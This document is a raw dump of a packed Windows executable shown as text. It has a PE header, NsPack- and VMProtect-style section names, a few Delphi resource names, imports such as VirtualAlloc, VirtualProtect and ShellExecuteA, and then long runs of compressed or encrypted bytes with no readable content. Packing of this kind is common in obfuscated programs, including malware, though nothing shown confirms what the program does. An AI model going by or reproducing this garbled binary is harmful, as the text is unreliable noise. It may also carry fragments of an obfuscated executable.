MZP      PE  L ��F[LordPE]� ��      �  � �          @                         �        @                         <    � @                                                   
                                                   .nsp0    �                       @  �.nsp1    �  � ��                `  �.nsp2        �                    `  �.vmp0      � 	   �             @  �                             
                                                   .nsp0                     P  �   � �   � �    �   P �
   � �   �	 �   �
 �    ��X5          �  �   �  �   �  �    �   8 �   ` �   � �    ��X5           �   4 4              ��X5           �   h 4              ��X5              � 4              ��X5           (  � 4              ��X5           P   4              ��X5           x  8 4              ��X5           �  l 4              ��X5         � �0 �@ �< �h �P �� �` �� �p �� �� � �� �0 �� �X �� �� �� �� �    ��X5           0  � �              ��X5           X  p �              ��X5           �  T �              ��X5           �  $ �              ��X5           �  � �              ��X5           �  � �              ��X5              � �              ��X5           H  d! �              ��X5           p  4# �              ��X5           �  % �              ��X5           �  �& �               ��X5          � �    ��X5            X� �              ��X5       � �( �    ��X5           @  �* R               ��X5       �    ��  H ��  p ��  � ��  � ��  � ��   ��  8 ��  ` ��  � ��  � ��  � ��    ��  ( ��  P ��  x ��  � ��  � ��  � ��   ��  @ ��  h ��  � �   � �    ��X5           8  �* @              ��X5           `  8. $              ��X5           �  \2 d              ��X5           �  �5 �              ��X5           �  |9 �              ��X5              L< d              ��X5           (  �? (              ��X5           P  �B �              ��X5           x  �D T              ��X5           �  F @              ��X5           �  HH $              ��X5           �  lK                ��X5             �L �               ��X5           @  xM 0              ��X5           h  �N ,              ��X5           �  �R �              ��X5           �  TV �              ��X5           �  �Y               ��X5             ^ h              ��X5           0  t_ �               ��X5           X  ``               ��X5           �  lb �              ��X5           �  <f t              ��X5           �  �i �              ��X5       � �	 �� �0	 � �X	 �    ��X5            	  tl                ��X5           H	  �l �              ��X5           p	  ps Y              ��X5       �  �	 ��  �	 ��  
 ��  @
 ��  h
 ��  �
 ��  �
 �    ��X5           �	  �z                ��X5           
  �z                ��X5           0
  �z                ��X5           X
  {                ��X5           �
  {                ��X5           �
  0{                ��X5           �
  D{                ��X5       0 ��
 �    ��X5           D�             B B A B O R T  B B A L L  B B C A N C E L    B B C L O S E  B B H E L P    B B I G N O R E    B B N O    B B O K    B B R E T R Y  B B Y E S  P R E V I E W G L Y P H    D L G T E M P L A T E  D V C L A L    P A C K A G E I N F O  T H _ G Z V I P 2 0 0 4    M A I N I C O N            �   (       @                                 �  �   �� �   � � ��  ��� ���   �  �   �� �   � � ��  ���                                 �����������������wwwwwwwwwwwwww��������������������W_����u_�W_��������"���������������*��������������������������������������������u_���W_�u_���������������������������������������������������������������������W_����������,�������,�������������������������������������������������������u_��������������"������������*��������������������������������������wwwwwwwwwwwwww��DDDDDDDDD@    ��DDDDDDDDDGpwp��DDDDDDDDDGpwp��DDDDDDDDDDDDDD��wwwwwwwwwwwwww���������������������                                                                                                                            0	       �     �                                                     �                                      �      |                 ��             @              e  t  �  �  �  �      �                  L  ��             Y                        KERNEL32.DLL SHELL32.DLL   LoadLibraryA   GetProcAddress   VirtualProtect   VirtualAlloc   VirtualFree   ExitProcess   ShellExecuteA       6    � �~<FvB��h�C � �.#�X�c��*\q5�-���`us�6:��aO׫��7��Z^�2 +zl��f�@ZfY��R��>� ��<��3� X$��)� fZfX���� �fR��� S�  a�6���X����߃? u
���    ��   ;���; t6�3{WQRS�����������֋ϋ������  ��[ZY_�� t����h �  j ������������������N�V�6���� t?�G,�<w���z t�8u�_f�������
�_������+�Ɖ���������:  �������A�� ��   ��+qtz�q�������6�^����t
��y�I���y�I3��G�t <�w���$��f����u�����3ۇ���� t��t�f��3�����t�f��h�����������<u?VVRVjh   R�����_^����  ���   ����V�v�h   W�����U[��   3Ɋ�� t(C��h����VQSRV�3�s�C�P�����Z[Y^����    �� t
a��   � a�������`������   ��h����> u�~ u�~ u�z�^�SRV��d���~��W�����_Z[�� tY��p���>��3Ɋ�� uF볋��RSP�8�u@� %����� QP��p��������YZ[Z�� t��F��v����F����   U��u�}�����m   s�3��d   s3��[   s!��R   �s�uA����P   I����D   �.���tO�����"�H������)   = }  s=   s��wAAV��+��^��u�F��3�A�����������r��]� j �����Ë ;Qu
�A8`�ÊB���D$�8agV <ЃI�j�X^��s��� ����N�|Au�^ SV�q3ۅ�W y~,U��9���;�r+Ѓ�:����s��5腉A� �Mu�]��b_�z^�9�[g��.��W�9����x<�� ~;�s@�cF��f�4п=��+��� �f�9�~�P\��)�*�N��:quf�r��B+О��V���ޏ�
���ꡞ¿�F���>@_^���QSv}�(����~�]���U�4��>1�?���M�u�^�B����_[	�*:3v���90W��B9}����P�~ V�xB�
�GϠ��	E�G;H$|�6�H�a��2���@�n���Ϩ��p=��(|�V[�jP�3��(RC�7u���e����F��L�vG7�s���;�u��C@��dW�E�vEY��3���Å�V������A��&u*�W�j�L0aZ�܏1�;�N���2P$Wu�K$D��"N����j���B���,�|�8�&T��M�H3G���HRzQ��יM���Q����f4K�M� �@����6Z
2�JO�89M`U�.�sjX�ᄘv�u���n��^@���f�
�u@�M����G�} �p�]�$#�3 ؃����fG��� ���N�U�dD��vĂ�#�G��*M�A��!�G���@ 	;���l}e��${
u=�r�
���`t ��s+`���y�U�Ae�l������T)j�C�~�i3���bF�;�����d-:�F�/��/uEIG%���
F��uX9��j�U�(�>���+#��D�	����r�f3�Jc��J�HX�DF1u�H��'+VȊ�.���	uv���p;�m��Q�E���h
�2�UՄ���#~H���ϲ#魄����[���ڄ�,�dR2"
7�P���H�|�}IX�(Q�zI�&`K�t(��!|I��я�##�J��a��1>�*]}HQ�;+�^N^�:�]p�!�����H>�E�Pj�"�DZ���i��	b�����I40L�y<w:~sI��8B�Ǌ�@9A@J��C�~;� r�����������+�n�u�xâ��]r��������Hr�D閕�U.X-.]_ r2�����]��T����Hu�<	uM�9��-�����a��h�$��L��SR�㝚wA��!zC��(�� 䈤���$e:@3I��Fn�j�.�@��
�_�=��0  L L �pK                 ]    q�  �  �k �� e8B�������)M��(���Oe (&\�!�k85vP��Nۜ�QG���Y�>Jo/��mh9Q{�*�ؘ5snw�5�*8�6>�p����n�%�}���ѽ��'h�w����'`W��
)���n�O�B��9/b����5&�(��d!�^,6������q�Q�{oȃ��ϻG'��q��ʇ�G}\f��`V���c6�����2�4�K��+c�_2߭�_�R~2<�ޏR�m�$L)d��Ea�_gW���]�E�F �o�cQ������U�nq�YF P|��׌�!� lM�
-���#�'�9p�L*��s�&{"����k2wD�M�k��^	��@0-/s��DC�:U,R�`N��dp߸��0�U�ɯ�2�'��5���+�|�Pӡ���lܾ>T扏qdRT��ƕ�ŲB(w�R�9�P��92�y�è� �B�Z�D�
G78~y``�4��م����+u���=|-�o�}�-3g/�\`���LM�ɩ�+����;;�,x�.VG��bv[��O��{�v��-ѯ�%��Bld�z�x�F�8��N��RZ�m�ܡ�"s��Q��r�C���)�v�:im��`n������E�s����$A��M~c�s�-�Zkij��0�a���k�3c�c��8Vs^@��{�^�	t*ރ�PP�M1������X���6v��o�P�l����y��}��(�,���@sr��b�������9���<��:xs�l5��'�i����z!�(�;T4��� ��K��$eE�d�ƭ���q�*S�x��C����(1ysU��1��6��Aţ���E��.U�{8���E��T˥�ۄkWD�Q��B�q�Q�4��fq{ğih�����6�[#���֠����#9}��:˸������w�"������w;	zGj	�
~Ñd+�����e>������Aw��$@d�+N)�L4:"n/��6[�¶�5{?g,�i!���Wh,٭�Wƹ/#��r�@W-���[dN���Oe�fւ�o��2Wc�8�X�l���L����B�2�+�fN|d[�m�G,"�g�/�G�/!�9p�����r�'��9Mj���;���OQ*8 γ�O�\wva��t���9����U�t��y��R\L0�RyoDo�����߾`�K)�_�nDM�a�t̉5���c\�H����x9���B���g&��+�q�<Y�N4[4��ɮ�0�DJE�A׀v�c��v�Gz0wwXe���ۤ��F��1����9��DU�&^��0���ůj�Mځ"'hʒX�}�����é��� {\����?~�Ȓ�K�{3U�\��a�	�2��Q�5�p�z:YU�C�����_���c�F�1�%���W����49�L�n8��'���6A髫F��զ��y/�3�
"L�S[D�w�p������$/^�`M[��SB�r�$K��R����0B���A�P��?�%��X����
��ժ�>_��l�f?�fߒ{<�f������	ϕM���A�u%>!�ʩ�`U"l�<����>iO���ꮯ���.=;�9����������I�
�1�$�χ��j�9ba�&J5��[�5��8&�$�w�@A��B�(�ͅvf�w�=�e2�1��>�7@�y�w�%�������_�] -?�
������_a��B�)F�e['�gCǒ[�K���NߔV�|���|&��*�������kRZD�R*;_�k��;<-;���.H<t�9�"����D����tA�g j�S9�X�ɿʅ�NNG�������/��=d���\#fhi������'z��.T�ݫO�c�O��'��N˼��U���N!ֽ��b)��{��`ͽ���#N��E�[���vVe�����u�_u^�j���Öx��3y���r3��x���4��ۯ�;[1_zl����Ur�@.�<�Ra�+�Ym	�J�5��·��T��\Po�Z�^ع1���b{M�ce.�����I�R�t%���I������z�&#{��j��UM�E���#K�;�g�X&] 'g��ђT<90d0�]+�dS	��ؙ>��[�ٶ�D:ʸ���?cp,����d:���X�O<��y����$)'����oN�'�\��he�!D������Hp��Í����D�u�������鞁�Q��0�H�??�������f=���-&�,KڔH _�������y+�O�&7��gQ��;�$!6�g"�Ԓ(3��|������V���r�~���i�߳}�cU�Q �X@��Kf1���.�f�����]�����au��d�ܒ����N졕N+j�N��׀&��6[ ���w
Ԁtx0z{Q���w��k�K�o|���^�F&��9Ư��5x��]Ds�X��z�̍�Y�RR��l,�EҚ"�u�J
֚H��u�U�IU�a���?1z�bI��8B�£w�f������J��fK����\�����ҍ������}�n�����}Uz0C������-,V���Z���*�[���h^Z�d�>z�HA���,"��ͱy�6�X���Ёj x�v��^��<W�Y���\��7������OL���6T[���s�?��0��|�xBQ���N97�cT�כV�)�!�mzs�vI�߻���ȣL��	�*��A3�隈*����C��Ƿg�Է��Xf�d�\����17�Oz�Äk���0�?�8�P^ٛw�J��pK�i�u7kVf�FJ�.�'ͣ;
���x���0��W]��W�9۫����ŗ���t���ՍН��H|��g:�F�͝k]�ETSp\��v����.�O��;����z��'��_$����� G��d{\�yXHR��G�B� HKڜ�*�488��[�!bT95�1�Zq��s����'�>(L{��fU%���r�8p��=W�մ��aHf����� ��U�{��H�t���!uL�һ���=85�Y��eO��-/�H��z��!�娒��)�|Y@KX�Q�$&x!��I�e�;��vd�_��ݬ�X�c:#�l���~�yb&��b�8���KE��|a��_u����G0��L�Ֆ?��߮-#���s��/����k���/�g���9Q�s�Z*��ܼ�+�x����i,p���{"�=�φ�G��h�R�s_&��헩U��q���Gz��^�~D��%jL�A���ϖ T��6F=�7`aq9�5�6+�M�A�Ei᥋z�O�W��y�X��п�A���Qү^�l���ᾺF���u���MV��^��~f�c8#�ŕ�LV0<����z�����2��[��g�ձ�X���_��;O9�$;�$7M��(��i�y���\�<�E�b�y^5����Zh;$�\��)� ��=+��?��R�ba���e+���7a��?��_/U����o�"Đ����Ѳ( ���Y�aLZ�KN��*u�)A���V�մ	0�xEFQE�̾�����H�%ε��48��)y5��o_���S�����ğ�dɇwE��#��Z7%��	���ƪI6�)*�B��|'
����l�#ʫ���j�1�W��g�B��F��ͧ��#
�����2��O@�l��&*�5��9֣4}]y�s����R�����x@1���%&�N��0�}Њ�⻽�$�Aa;}j�O�RG2�\�#�|��܊N��h'�Ϗ���g����8��V��ֈerƙ�=�&��E���Y5S 3����z���I��g�-�t�x����=��m����D�1vO�-�tVM�� �_���  �>#ʵ��Oc��L|=�f��"t�R ���[k���l�ҥ��PQh	m�>�
�"^\�n�N�Y]�y=��L��j���3��Kec Q�|% �P9�;���b0�l-Ϭ�B_H1;E/�h�Q��\ ���?φ�B���wVw�+�|�WO�P����XV� W�.:�%�є��s��̢��GA5B���Q�W̭P�YYŎd P=�|�����Б����6HWv��<��]|�7jVS4h8����H! ���fz��o�)�����kql7���bI�z�~�ţ��>�����D>�\v��4Ni���jC��WY-H|"�#ۑ؆E���(����>��[�M��)�
�W��C�6��T�3��T��̳$��}����8�@�*�L&*|/y������ �0B�Y������t��8v��� m�dƥޅ� �4P℣ ފ_ث �0_aI>��9����αIt�^h�?�p��������JZ�2HMx��`�����傌%b2�!b)r8N(�Pu�u��Lg�7���V\pK�㜜3S&��&�	F���X�[�����.a��[��ÒO���n��$4�� 6���.;x�1|��MRxҿ����@YX��\����A���w|��8r�zؤ���6��"�B�r�7i���_!<�G������\�mzl�+ۻ%�P�����j��@q��&v�i؄
f�M����'x?��@�86�xS;�D��eC󪹙S뙪�c����+�L
f�~ B��N�+{��憗^���7o萫;��B����Ήs�P�yg�'��	�&ck�]��s��x��Her��R����]�r�A���̑-�����cl��ɶAk\i8�#�d��}�E���o���֚�ުcйU���,���H��^mg#��d�Xږ%y�\�TK�[�t��x&@i4�}Rƣ;zŝZ����Jd���!�����F�Y��N�Z:ÿ��G˞�N}���Z��ۇ�F��w��LJՓ͇�����f�S,��HXd9�͠LJԒ`y�� c�?����6@|�JC65pS�ɠ��Y�I���-�׻�ez�$��f��q��Y���X�l�q��;�	7����%�׻�s$���cS���%s���f%e�1��8X�w�.hEծ9Fo��v�/1�;�S�~~���,�(n��L��|�ǐw�h,�^�Os>�*�Qܬu�W��2�	����bm9ښ�s�2�]$&��7�N"�M�rp�*��|5c��d��V�2���]A�`�!]���q��bڑCG�g4_u	ڪ�ԗ���1{� ���U&�6(Ƭio��43��w$��]a�&M�zʿ�( =��C���.r�/�:~�o-GU��//Ϗ=���E��<ǳ����la�>?�A�Oo�2�]o��恤���=�F�zh@Y�u�<�m�Z�2���G�l�++T_D��GNi�Mk�~����F >��񉕓��;�g������FHS��0�H��-9J?�{�p�T_�{��^Iw���l��<!RFU���y�A0���j�:�ǤI6��8�*�?@.���tvAj�L�ا�X��tM|�7;5���3���!a�BQ�J����t����[&�Am3��߲b���_�#6'�=Wk#Ui�~荢�4fmՌ��&���:/���5t��k�e�>zzk��Z�C2X��:_c�e��A[��o&�Pf�<b�ߞBlQ+��a�S���ğupc��n�;�;��n.$����W�!C��1��J!��n�ָ�	��A�$�O����{�m�g�{���n��s:,8hfxr�J�5��;Z߀>"��f��xݯ\ �5t���,ȁS�͝��au_�N��Ŝ�� <����ߎ�yxgTM�$�r$��z[83�FS3(~�G	 o2�����H�<Q���1e%֩��H��,I�=��(4���6�����jw���N��>p���m���}w�Qr�u��A��� T�4D�u$BS=[��k��x�
�tcg�e~�Z���K�		�����G��f� �A�KzA=���B�&�l���zyS�y�W�G��؇:�S��w�B�X<����~�^c��c��_s��pk.�������AfD��[�J��a1��H>T��2�'�V=S��'�)Z�H��1 ���H婥��ײ�H�2�j��[��y��C�~o�ա��T}�:	U�nz�������χ�(��t���7(O��I]�Q����xJ��0���oM��?�/�,/�B39]��~���O��?�Bf���N�*�y2U�ś8�����uL�����1*���$�@�6�#l*���_�SjIM�s5_��Us��zy�c���]�ּ*��g	ț ��1�m�L���Uf�W�-K�o�Lk6���Q�U�6ǣ��fF��U3S�D��h�&]<k�dX��B�f� }TUc���Zm�Q���;��htG��Ѥ\�)���DG-ǁt��ү圛藏Y�&ʀ�K0�؎������f�+����g�
�T����v[]�L�����L,��@s8�}�cs�aS����� ]L��<���� ����/��ogs��|ߐ"M\j��7S'�`�E)[��+>�����澄�p<���f�Gn�멩4�D�8ե��;���_,���Q�&�wu<��8e�=Vt�\=�ޏp�j��A�}�V"v.�x�MNm�r�_T"�=�����7 ��icw�Y�& ��]��*yl�m�b��@`�CQ��u�4���y��+m=6e+�vxЪ�.�3�66[q�v��"���ɶ�G����֊�ih�u?ə��>��<�-߃hl�_�|#��Z��u�S�%�$�AD̈��}>&r�X���/��D}��!�X~{W�6ڬK;����}Lx�����$�X�vz'��Vg��P�q���'@�4ϸR'Zg1����	U�=p0-��v`��O�;3Y��K��o��FaĖp�� �(�_%ѥ�1��0��v���Mc&F�G���l��N-��Ij/�+C���W�oȜiཱུ��Tw?�a��/zb�i�,T$�5&�*�	1v��M����	��v��y��u���8�����|@ ��R:�XC�N?Ěϖ~�%��m� ]2 �[�7����-I�M����w����.֐����Q^��ks�����]�*��yR���d�ru�}���n����.$fp�,�}��U��o`£��j#�<F�Q6��>	�W���8�(ƃˑ���7L��9'�M�Q�������w��-�Όzs��������kX�g�aF+��<⵽:F�F�g7ȴ_�y�C����ߤ�W�<|tfV>4�[���R�8�Z�eTެ�`�Ov�_�|��b�e?����W��,�����|�,n1h��Z%'V���(R��J�;=ȋv�&��l�$9�c)��YmkM7s� Ŝ̐��Hc��2_�@Ҩ��O��^�����M*2����_���ȍX�����G��K����'=�u�v�׌E���Ϛ��~�#�w��z�_6n�?>b̴pʧ��٥�O-_p�#��w9{ڇp�+��-R'�v��l��LC�O���� ȱ��%(�^�Yrj�D��.�^�B c��!�Mv��iS��k���d�?&��Nػ�/�נ��+�y`���)p��E5��,���l��p#�d'O����(�x�5#`�@��(� �.����&��=J-�����Qv�S�>@i���ǽ���q��
}�{�<�Y�����,�<���3�'C/��G��.ص���!�O�iM=&� #�K���=��X��lJՁ�Vz����79�hq����8���۲F[���o 9.��x"#y�K�������H���dOnm�hj�X{��oD52o�B~NO��y��B�GA����K�l�r��H��ˆ��k"O
�e̸����A�C@��Q#gȓ�v�FEu"�������0PV:�Ǌ)p�v [)�yٻB���u-;CAī��z��cX!��p�u�*+�^8�V}�&�E�ѣ�+՟��&�b���m;6�_3�1'ެ}ʮF���
���6��ʧ���%m������-���&� |m��C�K2$��юA�3z�*���u�âF �,Nm_"d�&^���}� 8�����3��~�.��Bp�T�r"^a�n+{����Of�l�cM���S��P���!0r@%�e�����)��5��T���7�J,�TiK�x�.Fr�
��mZD��%�;y��d~g��#���9��fooOo��t������@�*	&��?b-s���PDPR�V��л��`EB_��r�B0�A��w�A �����TQ�/�1�h��m��l�A��WC�'��̗NRՍTs�*@%
As��-$��B4�Hω��R���������<y����T~+��c�$(�e����MOLh�A��Q�̨p���w�+�1K���Vf�m<�c�#���G�Au�}�}ݿ�,����{���t�/¹�C�,���'�h�39����y���Ͻ�;�*�N�eC&P=�2�k���v����NS��G�v�N��	��� ���h�[��3��ۅ���H��A���+7��&�� �D� � w�0��\�,>#)Ct��}��d�3�h�qN�FU1��?�pj)���{�\����x�@*��N�x�Ⱥl����A���qc%�����%i��Nv��C����p6��^G��#)�FB�|�v[ܫp��mG
o2������\���������������U�S�#��)����L�6'.��ħ���͏���@()�.瑺(��X�`�������v��bY w,M��ZA���.��߫(��Ѯ��B�P�v��4��+O *�ě�}Wv��9)<��4�Q�6B�p>*���%�����.p��D�ߌ�Xx���5�~H��9do��;{��L�X���w������s���E��aI�;sX���Ջ��wBu��:�Ö�����qO�� k��̴�[6�.�h7�f����%D��/��S�~�]P�~�0�S݌s���L�W��Ɋ��3����*v��Ԍ��1�펎�����I��\���)� ���5��n��>� ��8���pi�S0�5]�9����R��O���0��v����j���!��ֿ,�iLi�"８���%����j��oS��;m,�i#�Z�5�d}gWy�88=E������d2�p�o���Ujw�UH�Ql��A�K�{��B�Š7#���2��`�$uk��@�k�Y��ee��ޢlO��js�U���:Mh4�����KΙ�lG6Jz�>�-��f�(o�H���vz^v�] ��D�єȜ}(���-����u
�|kҐ�g�$��??�]�RR����/3���O���0XV<e����Y��0?�6rN�i��fBKiM��v�s�"D3�k`�:"t3��t�I�ME�feXT
,��`�w��W��t��u������͎n	g�N�B?ف��&p���!�m~�����̊���x�%)P���2�c' �� �X��x��h9�D-�˃j������d'���n�%����6Z��{[=���9V+�sEق�>��O�<·:7�ᶮ�$6jv�o�`	���
�kr��j�����%�[�g)�]��}6̦٠�k'��0�rN ��=��`r��a�d����C�Nu8C���':���ѾR�ב{���� �+�3�N�
`���R�ό��''k��,M��|�K�[<A���݅8�MsA*�q�e {[��V���E�ڍ���Y�偤Z�b�p%s�yG\ �a��ovdz�1�?�/%}di��:��E3NW�ǵ�븗 �8!�1��);���9+A?`4����`Kd,GސE��}��$茓[�����+�uÜ\��k�A��-y�����r��`{oy����ַ7E�J�VZ|�j�M�����a(��Qmme+0,t%�ۃڄ�yJ���{���\�_�ű2 �+��4.�)H�y�&���Yz)l��f	_ͺ&�:^�њ[Hƹ���N����Sa,�&b<�:����q��JH�|���#���L��o�SA~d}�b<-y���ye��Oә��憢O��f��� �〬��l�v�*��oS�v=�1hq5�>�}�o��Y������ښ�
�10�qh��t� ���|��������ou�8C~����f%�j��T�S��ģ�z��"\���2�������)DuDKs��8GN�����z@bKg�P���}�#�).$A~�z��/l�a���2v$�R����]@ XR#Բ��#c�6Ӭ=��6�&��
�&�#$W���������_{p���p� *ꉗ�6m2=��<���Xt��Y���=f��t��3�%���䘆f2xL��G���������V],ֶoJS��j-Ȱ!�h����΅�(�Rө���ݡ�~7����6F�< 7U;���-��5�8�+.'(�����]���`���Y�i+�b����8�'����1ʥWK���R�MVW�T�Z���F�zR����	ID����M&Ė�����٧^�r��P��nt�/E�D!��-,���һ�-$��y����1h��e|���H��by���eח1��͓���d¤�	e"g�f����<��ˤO��MF�sK��,)0��K�*XixZ}�p�(�����醫N��;}��"��w<�����R�
ȴ��d�����~<FP�W����f~�@�W$���{M�zi�퍨>V�2;Y�x҆t�݀��*Hϙ��|�j͚���iD`w0�:=5��ѳ�X�mN�Kz��|p)wW�&�x�	��l�"ò�/B�WT��JMr4��VJ�$�sq�B*Ms�ǽ~��O��%B��QH�b޷<Lx,�[�έn�eꥦ�j���Æv-���'�K6m�h���Eh,Ǥ�0�+���fp�_��+W��`�6z�hU���@\UL�.*�I��"W�>�Кy����f$2��5����9n�(�	5�V'gս����&���_8-ډ.�����k��攮�T����I�k/��k��'�h���BK��wz������Fr�d���dzEn��˪ �5�O�i��e�+���M��J��ј�6��&JU��l����2/��=�}i�����o2q��)~GSE'I.�G���׆�	hް�� ����K�k6� +Blہfk��X��gN��bN�����c(�Օۋ�a�ƶ�Le�n
:��8��i��*�<D��GL�Twc�լp	�ű]l �U�ݵ4����r�5�,�.sכ�ѯ��ហn�dP�Cq��cIvJ��2�z�i��q<��� w�òܐT�WL���f���}���~؊n(?�
_�,���˙�S��<�����F���l�n4�&[�6>�~X����3;Q����2�jw:�ig���{c�+��Lw�.���a��M���^±��B��UQ>D^O:���7j�g��_3��]P�W٢��wx'��'�쐹�.�@�WM!i-]���^}Ŝhw( ҁ߮���̩���S<⻧v�J-���о��"�"�<K�r�&��w��(r�%���\GtՊ�_�kﺇk���k1l�'�o.~����b/Z Y�tM]���X�a��l�ƙrGn����{�;~$�*���ڞ&�gQ���B8&)��|)�U�3���rQ5��[}�c}|��I��8q�ߖ��z�;��lS�4��T,�ƒy�{8�Ṁh;��TÑ�2G��Kpa6�r�PB����f����y��J�$�=���$�J��S��ƾ	��򦂴)�䀷��׫�1�����Kw�4��ȡ�x����瑸�q��C`�l�W�?��W�Ħ����)�V�x�X�R���j����5]q��q^�<��S�R]I)Ҽ=-'���H�9z�e��qh"W>>��B�թ׹�0:k�O��7��7��.<�����0K��\���.��%�>��״3[۰�����鮸Uձ�I0���L��9=b�A8�i��W��hT:/��˨��7�W�2��؇��>銩�r��W �|*ߥpy"�@�'�,���N�����(����\�{
^�]�܇�ӌi�>��Ƭq܌�fn�s��4����e���c��)dt?�ley��'�"*Ծ��G��( �b�"�(���8ڙ�����/�[��h�ù��0H�-0�A�xD��Y@5�l�0{e��h%����N�t}͗��*�Q)�dỵ��h�&�X�h�]7�C(������Z�g=�
R�f�LG��<�ґ��<K���}`��Ϯ�1�u���T�l����'�(٣�:�8r�����!_ˬ��T�s�<�����
:���fD�/��7���g-E]�!���װ%��V/���^K͞��]���>�M�@��tp�.c�v
)�l0{��`J���Ut��ȩ������t5Af��6�\7��5�n%����Uq������H�7}m�'��ī��g_	t�ʟ��U�zu��2y��&E1k����9�^�^��aP�XQ]���Yo3�㐘E��>����ș�aNE4(&᫂�#T���d�f���1?�ջ�~8^x�l��XOqּo���VZ!XU�o�uL��E9B�%�>H�m�mg=�T�Fu?�39�riWU$p�g�����>_��EWa�����6��3�쇩�!<N�
��D�,�/gJ�%��t�U�������?��Ļ��v�N>fu���g��ip�����:�ةp�`]�#��v�ɣE�8�X�b%�hP'~L۰��ʭ������CC	�}�FG`��G��.�d�F��,f��.����TV{�.piF��$2a��B��
��������0���u]�T]�R�Ù�E[8��D�Ͳ����s���q��!�Մ�����SHcQm�C,�a��k,/���I�v��PŴT�W�^��:EP�������PO�D�	���Ϳoh0�f��.�v�����^�1	�U�FM�V,ray��{��`	L��n��$<�.��;�Q4^�k��l��v^�Y�=uʊ{�O�"uwI흯�߽�S��l߉��8o�Px+���\}��0;�=<��qd9��N��N����ֺ��]��ݵns�FRa��5?�.J�?o��B��}�74U�$����|�۱QѩJQ��	.2�=nG�� ))5�Zn�ڕ0w�_;�l/�!|K1�g�$ڶ�@_Ry��۴�?oO[I�Y�m�,9RiAK\~j�W
��!�$יg�6h�P*H��ՉC��3j��ӌ�
?��5��΄m5����V��߫v�������c�T~��߶�g/B�[�R�9]	+�9�񒮘Lo&�z������o���1�5kc�L��x^�{������MF�#==��fhGJ���ꯞ���j�,zH�!Ib->��hL<:��M�z13��h���>�e�m� ���w/���PR���S�t���g5����8ٝ�	Y)t�)p.���6� �ށ,��%��tz�Wu��?�3:�r�$�ɩ��-��n�%h)P��j�� ��n	�6�<�D *��J�{bj�鱏�t���!��D����V�u9�\�0;�[�#Q,��a$)C�s� �o�<�cٌS36�]�q�7|gw�q2���$$�� A�;��]>���F��D�j�|�y$�`��Hsep���Q[�����C�&�M�W�l��d��Z�ɵ��MC]�"wϫ�Y���\M<r)5�B<�&��k4�ř�!���4�����b�Jb��9���u�z7<Φ�����uЛ��(j���Z&�Y�5�4�̰�,���v�sb(ǮE0�����>o2E�l�}�W�^v������4`�k��|�������^z�Y�����"�E���}"p�p��� e��I�[>_��TG�z02��y�C(�!�ڏސ����
d�Vn�b����0�b�YEP^Ð�z*��[?�Qv�z�W��BE��Z�M��;ļ����EX��<����Y1��:f�x�o ��R "�������
���]�	�Kx�OT�W��]���S�����фО���b�[v�i%܍�a}���3"��Ԋ}Q�-�p!��]q�0U�iwՈ����dc5=0ȑV��I[˖l����>�rh̬�u�i��k�Z970�n��K�]W#Ģ2ٿgFb&�����g�&L���=kም����3n�;�(,쾁�ޓ��3zN�Y��,;j!$=+��R����q-J�'�� ��.� ������>!��ө�V�;3?^o��X��#�ɠ��?�m�8�/,�{�GF?t<��!�KhvS�_G��x	!'���f���1��H+zٲ��j��YT���{��|�x����W4>����[��s�$��N����a+��XvT��r�eD-��z���~��;��p�r�h�n�B�`��z������X}������<i,��O<00/7�-����w����(�I��?��U �R��$|m�F�\�^Ӥگ��7D��h����d ����3w8˔���ڜ�x�:*,�[l?�*��\�2IW?�GN�-Ɂ������Ӻϝ�Y"�2�*	�>���pɾ,|�{­�=A�t�;;�vOv�aꅘ:@���R1?:3�w�;��l]T��|�Wx`�>V�5r}Kk�o~t�8nZ�fkI�8͒�����	5֛��o�8�AG��S\�;�@�ş:E���#deό���N\��N�0�d����L8*脫���/jZ�FO���n��yD�Tk_P=����L�P�,�?�%�����-5��>8���Ka�]����q����%�l��' ��T&C�*��n�a�	J���i��l��S�&2���5�݀�ݽZAk� �8�y9��;��IM�H+ԋkb����^�pD�?��b�W�kU��ݞo����=����c����Q�շ�&h�j}��8N�ATn�R��L�3!s�����zT
y=rJN�&��ózmL�� �&��jQ�����G�9��%���h��#d,���y��s�N��;���N>�Y���"�l<Gθ�r~6;w3�A�����DI���fJC�Y�����!R��L�!cD�41�&Xq��"������(`�����x�J�i�z	�F��Z;��Έ~�=x�� ��
�&��#un�=a�eށ��g��&� (P��	y.
L��1���N�O�=�O+>6�2\��ma�C���9-G&n)?]��C��9>�c�D�U�QL
�v�#:��8�=b��LQh�!)ׂh��5,��'�0�r"�4�N�'�o��BR�W�zMh����W�E�u�6�'P���T����}�|4�	Op�#�.�nl�e�6gr�*uw���Z���cubh�b�Cق�\GH��7�Ƚ� �x({�gtIIu��6ʞ�6G�Y�X #Y)x�̰#��;�wXTd��릠�֜�zf�SϭV�iq�|�@AUӘ/
�}Y�"�Y�)�,��{���L�xV/�ߝ�6׈j�{�7��\��jO��lϔjŗ
����ۯ�5*�,7 ��g7I�Y��GQE��#�H�,k1��K�꿭*�v��	�Ce�9dَ����Á�R^]h��}�,��5cT��/�#��i0q��ʥz��7�e�Bq���xf��c��[l�e;���@�"j{�T�R�.}�#|�xQ޶�����&���7���[J!�,2~��ɨ����X�ϭ�N����b��cj/�m'<#j�~$nޤE��U���m����B8b_#2�0C%��6A����	G�	��9�/�������ɰ�=�
U��B�
;1���x�L���"H;Lc��޽:E@�;<�xi�����a�:���A&"�å3�I�s;]zN��`p��q�>�'f�4o�1M���N�Mr�B��(�!��"�5[�C��	�y�^۶5vC�T���"DL	7а�������4��9���Z��g�Zc48�W�,e-�t��E%x���J�nc֞j`�ɟ�^
��?򔨃\Y�!��� �!IUn6�6�	dǷ�<U��G��A��v,nZ�k��yG�-�ҽ#ٖn�;�;ؙ�g�����b+�A	Ʋ��ϋ��\��׷�l9�=�8�՞^w�L=���J�`��H�"Bm�~�1��ŨV=�}��`����PJ"#�����>�q#Hr����
3q����A�ۦ0 �.�`TOu�eo����S)��5�Cl���xm3	a��3�j���QT�����!F�J9�;���Rcm�Bι�:�8��btɌ)C�i��e�U�gE0V�ii�=@ͧ+��9s�`�6+3�(uIB�}��r/�95�g�4i�J��eK���]�����]��d*;�M+�p�;؃Ǔi������.�n�m���`"���3t#�E�ς_��ж������8�	ݕ�/�B�p�7n�I�R
$Y]�˞�E�Cݗ\ӦƮf�b��R�x�i�k�anv%�<��]cD̈́��4@Kn7�	+K�R�f� �3�Q?yP�ɋ[Z�/�6{-<AP���
t�^�bB��E�q� -��<��l�>��š��
